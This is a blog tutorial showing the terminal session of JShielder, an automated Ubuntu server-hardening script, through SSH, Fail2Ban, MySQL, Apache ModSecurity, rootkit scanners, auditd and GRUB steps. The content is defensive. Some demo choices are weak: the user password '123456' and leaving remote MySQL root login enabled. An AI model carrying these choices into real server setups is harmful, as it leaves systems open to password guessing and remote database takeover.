   binutils-x86-64-linux-gnu busybox-initramfs busybox-static bzip2 console-setup console-setup-linux cpp cups

Done.
  To EXIT Press x Key, Press ENTER to Continue

• After installing updates press enter.

 [+] Setting UMASK to a more Restrictive Value (027)
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Now JShielder will enhance security by blocking or disabling unnecessary components of system.

 [+] Disabling Unused FileSystems
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Now JShielder will block uncommon network ports to restrict scanning from external sources used in ethical hacking phases of pentesting.

[+] Disabling Uncommon Network Protocols
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Create new user. Enter username & password
• Enter username testuser1 & password 123456
• Enter y

[+] We will now Create a New User
Type the new username: testuser1
 Adding user testuser1' ... Adding new grouptestuser1' (1001) …
 Adding new user testuser1' (1001) with grouptestuser1' …
 Creating home directory /home/testuser1' ... Copying files from/etc/skel' …
Enter new UNIX password:
Retype new UNIX password:
 passwd: password updated successfully
 Changing the user information for testuser1
 Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:     
        Work Phone []:     
        Home Phone   []:     
        Other []:
 Is the information correct? [Y/n] y

Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Instructions to Generate an RSA KEY PAIR
 *** IF YOU DONT HAVE A PUBLIC RSA KEY, GENERATE ONE ***
      Follow the Instruction and Hit Enter When Done
      To receive a new Instruction
 RUN THE FOLLOWING COMMANDS  a) ssh-keygen -t rsa -b 4096

• Copy & paste above command in the same terminal & hit enter.

 ssh-keygen -t rsa -b 4096 

 b) cat /home/testuser1/.ssh/id_rsa.pub >> /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue

Run the Following Command to copy the Key
  Press ENTER when done
  ssh-copy-id -i /root/.ssh/id_rsa.pub testuser1@192.168.1.11
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Securing SSH
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 chattr: No such file or directory while trying to stat /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• From SSH will be secured. Then it will install Fail2ban which works as intrusion prevention system. It main motive to protect from brute force attacks.

[+] Setting IPTABLE RULES
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Installing Fail2Ban
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 Suggested packages:
   sendmail-doc rmail logcheck resolvconf sasl2-bin
 The following NEW packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 0 upgraded, 9 newly installed, 0 to remove and 1 not upgraded.
 374 not fully installed or removed.
 Need to get 899 kB of archives.
 After this operation, 4,449 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

• Then it will remove python-pyinotifiy enter Y to remove python dependency.

Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   python3-pyinotify whois
 Suggested packages:
   mailx monit sqlite3 python-pyinotify-doc
 The following NEW packages will be installed:
   fail2ban python3-pyinotify whois
 0 upgraded, 3 newly installed, 0 to remove and 1 not upgraded.
 Need to get 398 kB of archives.
 After this operation, 2,110 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 fail2ban all 0.10.2-2 [329 kB]

Created symlink /etc/systemd/system/multi-user.target.wants/fail2ban.service → /lib/systemd/system/fail2ban.service.
 Processing triggers for ureadahead (0.100.0-21) …
 Setting up whois (5.3.0) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up python3-pyinotify (0.9.6-1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install mysql

[+] Installing, Configuring and Optimizing MySQL
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 mysql-server is already the newest version (5.7.26-0ubuntu0.18.04.1).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
 Securing the MySQL server deployment.

 Connecting to MySQL using a blank password.\

 VALIDATE PASSWORD PLUGIN can be used to test passwords
 and improve security. It checks the strength of password
 and allows the users to set only those passwords which are
 secure enough. Would you like to setup VALIDATE PASSWORD plugin?

 Press y|Y for Yes, any other key for No:y

• Choose the password policy. Enter 1

There are three levels of password validation policy:
 LOW    Length >= 8
 MEDIUM Length >= 8, numeric, mixed case, and special characters
 STRONG Length >= 8, numeric, mixed case, special characters and dictionary                  file
 Please enter 0 = LOW, 1 = MEDIUM and 2 = STRONG: 1

New password:

Re-enter new password:

Estimated strength of the password: 100
 Do you wish to continue with the password provided?(Press y|Y for Yes, any other key for No) :y

• Enter y & remove the anonymous user for enhancing security of the mysql. This will restrict anonymous login into mysql. As per Digital forensics expert of iicybersecurity, some DB Admin leave anonymous login, which further helps in attacks.

 By default, a MySQL installation has an anonymous user,
 allowing anyone to log into MySQL without having to have
 a user account created for them. This is intended only for
 testing, and to make the installation go a bit smoother.
 You should remove them before moving into a production
 environment.
 Remove anonymous users? (Press y|Y for Yes, any other key for No) :y

• This depends totally on requirement whether to give remote root access or not. So we will enter n

 Normally, root should only be allowed to connect from
 'localhost'. This ensures that someone cannot guess at
 the root password from the network.
 Disallow root login remotely? (Press y|Y for Yes, any other key for No): n 

• Remove the test user which comes by default in mysql. Enter y

By default, MySQL comes with a database named 'test' that
 anyone can access. This is also intended only for testing,
 and should be removed before moving into a production
 environment.
 Remove test database and access to it? (Press y|Y for Yes, any other key for No) : y

 Dropping test database…
 Success.

 Removing privileges on test database…
 Success. 

 Reloading the privilege tables will ensure that all changes
 made so far will take effect immediately.
 Reload privilege tables now? (Press y|Y for Yes, any other key for No) :y

Success.
 All done!
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will apache web server.

[+] Installing Apache Web Server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 apache2 is already the newest version (2.4.29-1ubuntu4.7).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install PHP required files.

[+] Installing, Configuring and Optimizing PHP
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 php is already the newest version (1:7.2+60ubuntu1).
 php-pear is already the newest version (1:1.10.5+submodules+notgz-1ubuntu1.18.04.1).
 php-pear set to manually installed.
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   php-cli
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 3,160 B of archives.
 After this operation, 12.3 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 php-cli all 1:7.2+60ubuntu1 [3,160 B]
 Fetched 3,160 B in 1s (2,978 B/s)

Preparing to unpack …/python-mysqldb_1.3.10-1build1_amd64.deb …
 Unpacking python-mysqldb (1.3.10-1build1) …
 Setting up python-mysqldb (1.3.10-1build1) …
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install modsecurity.

[+] Installing ModSecurity
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 libxml2 is already the newest version (2.9.4+dfsg1-6.1ubuntu1.2).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libxml2-dev libxml2-utils
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 793 kB of archives.
 After this operation, 3,731 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Preparing to unpack …/modsecurity-crs_3.0.2-1_all.deb …
 Unpacking modsecurity-crs (3.0.2-1) …
 Setting up modsecurity-crs (3.0.2-1) …
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Setting up liblua5.1-0:amd64 (5.1.5-8.1build2) …
 Setting up libapache2-mod-security2 (2.9.2-1) …
 apache2_invoke: Enable module security2
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• After then run the following command to restart apache2.

[+] Setting UP OWASP Rules for ModSecurity
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]OK
 Enabling module headers.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Optimizing Apache
 -- Enabling ModRewrite
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]Enabling module rewrite.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Enter email id to receive alerts.

[+] Installing ModEvasive
 Type Email to Receive Alerts testemail.com
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   bsd-mailx
 The following NEW packages will be installed:
   bsd-mailx libapache2-mod-evasive
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 80.5 kB of archives.
 After this operation, 256 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 bsd-mailx amd64 8.1.2-0.20160123cvs-4 [66.0 kB]
 Get:2 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-evasive amd64 1.10.1-3 [1

Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libapache2-mod-evasive (1.10.1-3) …
 apache2_invoke: Enable module evasive
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install Mod_Qos

[+] Installing Mod_Qos/Spamhaus
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libapache2-mod-qos
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 202 kB of archives.
 After this operation, 744 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-qos amd64 11.44-1build1 [202 kB]
 Fetched 202 kB in 3s (80.2 kB/s)
 Selecting previously unselected package libapache2-mod-qos

Building dependency tree
 Reading state information… Done
 E: Unable to locate package libapache2-mod-spamhaus
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will configure Fail2ban

[+] Configuring Fail2Ban
 Configuring Fail2Ban……
 [ ok ++++++++++++++++++++++++++++++++++++++++++++++++++   ][….] Restarting fail2ban (via systemctl): fail2ban.service.
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install additional packages.

[+] Installing Additional Packages
 Install tree………….
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   tree
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 40.7 kB of archives.
 After this operation, 105 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tree amd64 1.7.0-5 [40.7 kB]
 Fetched 40.7 kB in 2s (24.3 kB/s)
 Selecting previously unselected package tree.
 (Reading database … 228842 files and directories currently installed.)
 Preparing to unpack …/tree_1.7.0-5_amd64.deb …
 Unpacking tree (1.7.0-5) …
 Setting up tree (1.7.0-5) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Setting up apt-show-versions (0.22.7ubuntu1) …
 ** initializing cache. This may take a while **
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Install PHPUnit……….
 config-set succeeded
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install ipv6 dependencies & will install server additional hardening & press y or n for enabling or disabling USB support.

[+] Running additional Hardening Steps
 Running Additional Hardening Steps….
 Reading package lists… Done++++++++++++++++++++++++++   ]
 Building dependency tree
 Reading state information… Done
 Package 'at' is not installed, so not removed
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7

Preparing to unpack …/libpam-cracklib_1.1.8-3.6ubuntu2.18.04.1_amd64.deb …
 Unpacking libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Securing Cron
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
Do you want to Disable USB Support for this Server? (y/n): n
OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install Unhide for displaying hidden processes which are running in the background.

[+] Installing UnHide
 Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   rkhunter
 The following NEW packages will be installed:
   unhide
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 46.6 kB of archives.
 After this operation, 136 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 unhide amd64 20130526-1 [46.6 kB]
 Fetched 46.6 kB in 2s (25.9 kB/s)
 Selecting previously unselected package unhide.
 (Reading database … 228917 files and directories currently installed.)
 Preparing to unpack …/unhide_20130526-1_amd64.deb …
 Unpacking unhide (20130526-1) …
 Setting up unhide (20130526-1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install Tiger dependency.

[+] Installing Tiger
 Tiger is a security tool that can be use both as a security audit and intrusion detection system
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   chkrootkit john john-data tripwire
 The following NEW packages will be installed:
   chkrootkit john john-data tiger tripwire
 0 upgraded, 5 newly installed, 0 to remove and 1 not upgraded.
 Need to get 6,868 kB of archives.
 After this operation, 24.0 MB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tripwire amd64 2.4.3.1-2 [1,647 kB]

Setting up john-data (1.8.0-2build1) …
 Setting up john (1.8.0-2build1) …
 For More info about the Tool use the ManPages
  man tiger
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install rootkit hunter.

[+] Installing RootKit Hunter
 Rootkit Hunter is a scanning tool to ensure you are you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
 - MD5 hash compare      
 - Look for default files used by rootkits      
 - Wrong file permissions for binaries      
 - Look for suspected strings in LKM and KLD modules      
 - Look for hidden files      
 - Optional scan within plaintext and binary files 

File updated: searched for 181 files, found 152
 ***To Run RootKit Hunter ***
      rkhunter -c --enable all --disable none
      Detailed report on /var/log/rkhunter.log
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will tune bashrc.

[+] Tunning bashrc, nano and Vim
 Tunning .bashrc……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Tunning Vim……
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Tunning Nano……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then JShielder will update create cron job.

[+] Adding Daily System Update Cron Job
 Creating Daily Cron Job
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Most of configuration of JShielder will be automate. So now it will install artillery.

[+] Cloning Repo and Installing Artillery
 fatal: destination path 'artillery' already exists and is not an empty directory.
 Welcome to the Artillery installer. Artillery is a honeypot, file monitoring, and overall security tool used to protect your nix systems.
 Written by: Dave Kennedy (ReL1K)

 Do you want to install Artillery and have it automatically run when you restart [y/n]: y

[] Adding artillery into startup through init scripts.. [] Triggering update-rc.d on artillery to automatic start…
 [*] Checking out Artillery through github to /var/artillery
 Cloning into '/var/artillery'…
 remote: Enumerating objects: 35, done.
 remote: Counting objects: 100% (35/35), done.
 remote: Compressing objects: 100% (35/35), done.
 remote: Total 1632 (delta 17), reused 3 (delta 0), pack-reused 1597

Setting Iptable rules for artillery
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Artillery configuration file is /var/artillery/config
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install PSAD

[+] Install PSAD
 PSAD is a piece of Software that actively monitors you Firewall Logs to Determine if a scan
        or attack event is in Progress. It can alert and Take action to deter the Threat
    NOTE:    IF YOU ARE ONLY RUNNING THIS FUNCTION, YOU MUST ENABLE 

 LOGGING FOR iptables   
 iptables -A INPUT -j LOG   \
 iptables -A FORWARD -j LOG

 Do you want to install PSAD (Recommended)? (y/n): y

To EXIT Press x Key, Press ENTER to Continue

• Then disable compilers.

[+] Disabling Compilers
 Disabling Compilers…..
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
  If you wish to use them, just change the Permissions
  Example: chmod 755 /usr/bin/gcc 
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Now secure the tmp folder. Enter y

[+] Securing /tmp Folder
 ¿Did you Create a Separate /tmp partition during the Initial Installation? (y/n): y

Nice Going, Remember to set proper permissions in /etc/fstab
 Example:
 /dev/sda4   /tmp   tmpfs  loop,nosuid,noexec,rw  0 0 
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• JShielder will restrict access to apache config files.

[+] Restricting Access to Apache Config Files
 Restricting Access to Apache Config Files……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++    ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will restrict unattended security updates. Press y

[+] Enable Unattended Security Updates
 ¿Do you Wish to Enable Unattended Security Updates? (y/n): y

• It will install accounting dependency.

0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 87.2 kB of archives.
 After this operation, 304 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 acct amd64 6.6.4-1 [87.2 kB]
 Fetched 87.2 kB in 2s (48.7 kB/s)                      
 Selecting previously unselected package acct.
 (Reading database … 229408 files and directories currently installed.)
 Preparing to unpack …/acct_6.6.4-1_amd64.deb …
 Unpacking acct (6.6.4-1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Processing triggers for install-info (6.5.0.dfsg.1-2) …
 Setting up acct (6.6.4-1) …
 update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
 update-rc.d: warning: stop runlevel arguments (1) do not match acct Default-Stop values (0 1 6)
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 OK

• Install autitd enter y

[+] Installing auditd
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   libauparse0
 Suggested packages:
   audispd-plugins

After this operation, 803 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Enabling auditing for processes that start prior to auditd
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]Sourcing file `/etc/default/grub'
 Generating grub configuration file …
 Found linux image: /boot/vmlinuz-4.18.0-25-generic
 Found initrd image: /boot/initrd.img-4.18.0-25-generic
 Found linux image: /boot/vmlinuz-4.18.0-15-generic
 Found initrd image: /boot/initrd.img-4.18.0-15-generic
 Found memtest86+ image: /boot/memtest86+.elf
 Found memtest86+ image: /boot/memtest86+.bin
 done
 Configuring Auditd Rules
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]

Done.
  To EXIT Press x Key, Press ENTER to Continue

• JShielder will install & enable sys stat.

[+] Installing and enabling sysstat
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   isag
 The following NEW packages will be installed:
   sysstat
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 295 kB of archives.
 After this operation, 1,192 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 sysstat amd64 11.6.1-1 [295 kB]
 Fetched 295 kB in 2s (124 kB/s)    

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue                

• Install arpwatch for monitoring ARP traffic. Enter y

[+] ArpWatch Install
 ArpWatch is a tool for monitoring ARP traffic on System. It generates log of observed pairing of IP and MAC.
 Do you want to Install ArpWatch on this Server? (y/n): y

Synchronizing state of arpwatch.service with SysV service script with /lib/systemd/systemd-sysv-install.
 Executing: /lib/systemd/systemd-sysv-install enable arpwatch

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Set GNU Bootloader password. More information on working of bootloader is part of advance ethical hacking course of International Institute of Cyber Security (IICS, iiCyberSecurity).

[+] GRUB Bootloader Password
 It is recommended to set a password on GRUB bootloader to prevent altering boot configuration (e.g. boot in single user mode without password)
 Do you want to set a GRUB Bootloader Password? (y/n): y

Do you want to set a GRUB Bootloader Password? (y/n): y
 Enter password: 
 Reenter password: 
 PBKDF2 hash of your password is grub.pbkdf2.sha512.10000.15D5D8416652D02126C81FCF8C49A59B82F070F8010A13412C420345E97AA9CADC8798E7218A27105875C0C0950DC6A7EAC1D3DA92C32A6107FF572CB42A1D53.C05B506339CB3227411FF804E9587808E40CD72DD07CD749B004D324E9F90D2A4D092E6C9BE64E6E61DC71FB32A8DB00E65CA7BE6582975E30F64C9D46CD1C19
 Sourcing file `/etc/default/grub'
 Generating grub configuration file …

Found memtest86+ image: /boot/memtest86+.bin
 done
 On every boot enter root user and the password you just set
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Secure boot settings.

Securing Boot Settings
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Setting File Permissions on Critical System Files
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
 Setting Sticky bit on all world-writable directories
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
: Read-only file system
 chmod: changing permissions of '/snap/core/7270/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/7270/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core/6350/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/var/tmp': Read-only file system

  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Above you can see that permission has changed. All changes have been completed. Then it will display message that JShielder has fully configured Ubuntu for creating & deploying web applicaitons.

The post How to Secure any Linux Server | Automated Server Hardening script appeared first on Information Security Newspaper | Hacking News.